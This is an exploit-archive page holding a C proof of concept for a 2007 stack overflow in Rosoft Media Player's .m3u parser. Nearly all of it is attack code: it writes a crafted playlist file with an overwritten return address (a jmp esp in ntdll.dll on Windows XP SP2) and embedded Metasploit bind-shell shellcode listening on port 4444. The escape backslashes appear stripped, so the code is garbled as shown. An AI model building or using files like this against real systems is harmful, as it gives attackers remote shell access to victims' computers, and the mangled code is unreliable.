Rosoft Media Player <= 4.1.7 .M3U Stack Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Rosoft Media Player <= 4.1.7 .M3U Stack Overflow Exploit
# Published : 2007-12-18
# Author : devcode
# Previous Title : jetAudio 7.0.5 COWON Media Center MP4 Stack Overflow Exploit
# Next Title : Windows Media Player 6.4 MP4 File Stack Overflow PoC
/* rosoft-player-expl.c: 2007-12-18:
 *
 * Copyright (c) 2007 devcode
 *
 *
 *          ^^ D E V C O D E ^^
 *
 * Rosoft Media Player <= 4.1.7 .M3U Stack Overflow
 * [0-DAY]
 *
 *
 * Description:
 *    A stack overflow occurs when parsing an .m3u file
 *    which does not contain any delimiters.
 *
 * Hotfix/Patch:
 *    None.
 *
 * Vulnerable systems:
 *    Rosoft Media Player <= 4.1.7
 *
 * Tested on:
 *    Rosoft Media Player 4.1.7
 *
 *    This is a PoC and was created for educational purposes only. The
 *    author is not held responsible if this PoC does not work or is
 *    used for any other purposes than the one stated above.
 *
 * Notes:
 *    Nothing much here, except the player itself is a piece of shit.
 *    The vulnerability was found by Juan Pablo Lopez Yacubian
 *    (jplopezy_at_gmail.com). Come to think of it, the entire suite
 *    of products offered by Rosoft Engineering sucks bawls.
 *
 */
#include <stdlib.h>
#include <stdio.h>

/**
 * Invalid chars: 0x1A 0xA 0xD 0x00
 * win32_bind -
 * EXITFUNC=thread LPORT=4444 Size=344 Encoder=PexFnstenvSub
 * http://metasploit.com
 */
unsigned char uszShellcode[] =
    "x90x90x90x90x90x90x90x90"
    "x33xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13x60"
    "x90xf0xf7x83xebxfcxe2xf4x9cxfax1bxbax88x69x0fx08"
    "x9fxf0x7bx9bx44xb4x7bxb2x5cx1bx8cxf2x18x91x1fx7c"
    "x2fx88x7bxa8x40x91x1bxbexebxa4x7bxf6x8exa1x30x6e"
    "xccx14x30x83x67x51x3axfax61x52x1bx03x5bxc4xd4xdf"
    "x15x75x7bxa8x44x91x1bx91xebx9cxbbx7cx3fx8cxf1x1c"
    "x63xbcx7bx7ex0cxb4xecx96xa3xa1x2bx93xebxd3xc0x7c"
    "x20x9cx7bx87x7cx3dx7bxb7x68xcex98x79x2ex9ex1cxa7"
    "x9fx46x96xa4x06xf8xc3xc5x08xe7x83xc5x3fxc4x0fx27"
    "x08x5bx1dx0bx5bxc0x0fx21x3fx19x15x91xe1x7dxf8xf5"
    "x35xfaxf2x08xb0xf8x29xfex95x3dxa7x08xb6xc3xa3xa4"
    "x33xc3xb3xa4x23xc3x0fx27x06xf8xe1xabx06xc3x79x16"
    "xf5xf8x54xedx10x57xa7x08xb6xfaxe0xa6x35x6fx20x9f"
    "xc4x3dxdex1ex37x6fx26xa4x35x6fx20x9fx85xd9x76xbe"
    "x37x6fx26xa7x34xc4xa5x08xb0x03x98x10x19x56x89xa0"
    "x9fx46xa5x08xb0xf6x9ax93x06xf8x93x9axe9x75x9axa7"
    "x39xb9x3cx7ex87xfaxb4x7ex82xa1x30x04xcax6exb2xda"
    "x9exd2xdcx64xedxeaxc8x5cxcbx3bx98x85x9ex23xe6x08"
    "x15xd4x0fx21x3bxc7xa2xa6x31xc1x9axf6x31xc1xa5xa6"
    "x9fx40x98x5axb9x95x3exa4x9fx46x9ax08x9fxa7x0fx27"
    "xebxc7x0cx74xa4xf4x0fx21x32x6fx20x9fx8fx5ex10x97"
    "x33x6fx26x08xb0x90xf0xf7";

int main( int argc, char **argv ) {
    FILE *f = NULL;
    char *p = NULL;

    printf( "ntRosoft Media Player <= 4.1.7 .M3U Stack Overflownn" );
    printf( "ttCopyright (c) 2007 devcodennn" );

    if ( argc < 2 ) {
        printf( "Usage: %s <file>n", argv[0] );
        return -1;
    }
   
    f = fopen( argv[1], "w+" );
    if ( !f ) {
        printf( "[-] Unable to create m3u file.n" );
        return -1;
    }

    p = (char *)malloc( 5000 );
    memset( p, 0x41, 5000 );

    /**
     * We need a valid address here that contains
     * a value of 0 and is writable, and of course,
     * no 0x00s in the address itself. Try 0x1270FE0 
     * if 0x7FFDFFF0 doesn't work.
     */
    memcpy( p+4096, "xF0xFFxFDx7F", 4 );

    /**
     * Windows XP SP2 Pro - jmp esp (0x7C941EED, ntdll.dll)
     */
    memcpy( p+4104, "xEDx1Ex94x7C", 4 );
    memcpy( p+4108, uszShellcode, sizeof( uszShellcode ) );

    /**
     * Cleanup
     */
    fputs( p, f );
    fclose( f );
    free( p );

    printf( "[*] File generated succesfully!n" );
    return 0;
}

// www.Syue.com [2007-12-18]